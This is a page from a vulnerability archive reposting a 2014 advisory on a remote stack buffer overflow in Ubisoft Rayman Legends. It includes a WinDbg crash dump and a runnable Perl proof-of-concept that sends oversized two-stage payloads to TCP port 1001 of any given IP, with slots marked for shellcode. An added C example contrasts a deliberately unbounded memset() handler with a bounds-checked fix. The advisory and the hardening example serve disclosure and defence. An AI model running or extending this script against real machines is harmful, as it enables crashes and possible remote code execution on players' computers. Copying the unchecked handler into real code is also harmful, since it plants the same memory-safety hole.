Ubisoft Rayman Legends 1.2.103716 Buffer Overflow
Source: zeroscience.mk   Author: LiquidWorm   Published: 2014-06-18
#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused by a memset() boundary error in the
# processing of incoming data received over raw socket connections on TCP
# port 1001. The length handed to memset() is not bounded against the stack
# buffer it fills, so a long string of bytes sent on a second connection
# (after a first connection has been made to the same port) overflows the
# stack. Successful exploitation could allow execution of arbitrary code on
# the affected node.
#
# ===========================================================================
#
# (15a8.f0c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000
# eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0         nv up ei pl nz na pe cy
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
# MSVCR100!memset+0x5f:
# 715e26df f3ab            rep stos dword ptr es:[edi]
# 0:028> d esp
# 0f16dcec  42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00  BBBBd...........
# 0f16dcfc  42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c  BBBBBBBB"...PBK.
# 0f16dd0c  90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00  .C......(.......
# 0f16dd1c  50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f  PBK.l.......L...
# 0f16dd2c  e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07  ....H.......<...
# 0f16dd3c  3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41  <......u....AAAA
# 0f16dd4c  41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42  AAAAAAAAAAAABBBB
# 0f16dd5c  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
#
# ===========================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#            Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2014-5187
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php
#
#
# 22.05.2014
# 
#

use IO::Socket;

print
 "
 @****************************************@
 |                                        |
 | Ubisoft Rayman Legends BoF PoC Script  |
 |                                        |
 |              ZSL-2014-5187             |
 |                                        |
 @****************************************@
 ";

$ip="$ARGV[0]";

if($#ARGV!=0)
{
   print "\n\n\x20\x20\x1c\x20Usage: $0 <ipaddr>\n\n";
   exit();
}

print "\n\x20\x1c\x20Target: $ip\n";
print "\x20\x1c\x20Initiating first connection\n";

sleep 2;
$conn1=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');
if(!$conn1)
{
   print "\n\x20*** Connection error!\n";
   exit();
} else
  {
     print "\x20\x1c\x20Connection established\n";
  }

print $conn1 "\x44"x36;         # first-stage filler
print $conn1 "\x45\x45\x45\x45"; # 4-byte marker
print $conn1 "\x46"x2000;       # long tail; shellcode would be placed here (SC container)
print "\x20\x1c\x20Payload sent\n";
close $conn1;
print "\x20\x1c\x20First stage completed\n\x20\x1c\n";
print "\x20\x1c\x20Initiating second connection\n";

sleep 2;
$conn2=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');
if(!$conn2)
{
   print "\n\x20*** Connection error!\n";
   exit();
} else
  {
     print "\x20\x1c\x20Connection established\n";
  }

print $conn2 "\x41" x 16;        # 16 bytes of padding (the AAAA run in the dump)
print $conn2 "\x42\x42\x42\x42"; # the 4 bytes that land at ESP in the crash dump
print $conn2 "\x43"x1000;        # long tail that triggers the memset() overflow; shellcode would be placed here (SC container)
print "\x20\x1c\x20Payload sent\n";
print "\x20\x1c\x20Second stage completed\n";
close $conn2;
print "\x20\x1c\x20t00t!\n";
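The "Desc" paragraph in the advisory header describes the bug class behind this crash: a memset() whose length comes from the network and is never compared against the size of the stack buffer it fills. The C program below is an added example, not code from the advisory, from Ubisoft or from Rayman Legends. It reconstructs that pattern in a hypothetical packet handler and places a bounds-checked version next to it. The wire format (a 4-byte little-endian length followed by a fill byte), the 16-byte buffer, the sample messages and all function names are assumptions made for illustration; the game's real protocol is not documented on this page.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Fixed-size stack buffer in the hypothetical handler, and the assumed wire
 * header: a 4-byte little-endian fill length, then one fill byte. */
#define SCRATCH_LEN 16
#define HEADER_LEN  5

/* Constructed test messages (not captured traffic). BENIGN_MSG asks for an
 * 8-byte fill with 0x43; EVIL_MSG asks for 1000 bytes (0x03e8), the size of
 * the "\x43"x1000 block the PoC above sends on its second connection. */
static const uint8_t BENIGN_MSG[] = { 0x08, 0x00, 0x00, 0x00, 0x43 };
static const uint8_t EVIL_MSG[]   = { 0xe8, 0x03, 0x00, 0x00, 0x43 };

/* Decode the assumed header. Returns 0 on success, -1 if the message is short. */
static int parse_fill_header(const uint8_t *msg, size_t msglen,
                             uint32_t *len, uint8_t *fill)
{
    if (msg == NULL || msglen < HEADER_LEN)
        return -1;
    *len  = (uint32_t)msg[0]       | (uint32_t)msg[1] << 8 |
            (uint32_t)msg[2] << 16 | (uint32_t)msg[3] << 24;
    *fill = msg[4];
    return 0;
}

/* Bytes that memset(scratch, fill, len) would write past the end of scratch. */
static size_t overflow_bytes(uint32_t len)
{
    return len > SCRATCH_LEN ? (size_t)len - SCRATCH_LEN : 0;
}

/* VULNERABLE pattern: the wire length reaches memset() unchecked. Any len
 * above SCRATCH_LEN overwrites whatever follows the buffer on the stack
 * (saved registers, return address), and a very large len faults inside the
 * fill loop of memset itself, which is where the crash dump above stops
 * (MSVCR100!memset, rep stos). Only ever call this with trusted input. */
static int handle_fill_unchecked(const uint8_t *msg, size_t msglen)
{
    uint8_t scratch[SCRATCH_LEN];
    uint32_t len = 0;
    uint8_t fill = 0;

    if (parse_fill_header(msg, msglen, &len, &fill) < 0)
        return -1;
    memset(scratch, fill, len);                  /* no bound on len */
    return len ? (int)scratch[0] : 0;
}

/* HARDENED: the one missing check, request length against destination size,
 * applied before the write. Returns -2 when the request is rejected. */
static int handle_fill_checked(const uint8_t *msg, size_t msglen)
{
    uint8_t scratch[SCRATCH_LEN];
    uint32_t len = 0;
    uint8_t fill = 0;

    if (parse_fill_header(msg, msglen, &len, &fill) < 0)
        return -1;
    if (len > sizeof scratch)                    /* the boundary check */
        return -2;
    memset(scratch, fill, len);
    return len ? (int)scratch[0] : 0;
}

int main(void)
{
    uint32_t len = 0;
    uint8_t fill = 0;

    (void)parse_fill_header(EVIL_MSG, sizeof EVIL_MSG, &len, &fill);
    printf("benign request, checked handler returns %d\n",
           handle_fill_checked(BENIGN_MSG, sizeof BENIGN_MSG));
    printf("evil request (len=%u): checked handler returns %d, "
           "unchecked memset would overrun the buffer by %zu bytes\n",
           len, handle_fill_checked(EVIL_MSG, sizeof EVIL_MSG),
           overflow_bytes(len));
    /* handle_fill_unchecked(EVIL_MSG, ...) is deliberately never called. */
    return 0;
}
```

Build and run with `cc -Wall -Wextra fill.c -o fill && ./fill`. The program never feeds the oversized message to the unchecked handler; it only reports how far that memset() would run past the buffer, which is the same measurement a triager makes from the register state in the crash dump (fill byte in EAX, remaining count in ECX) before deciding whether the overwrite reaches a return address.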

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved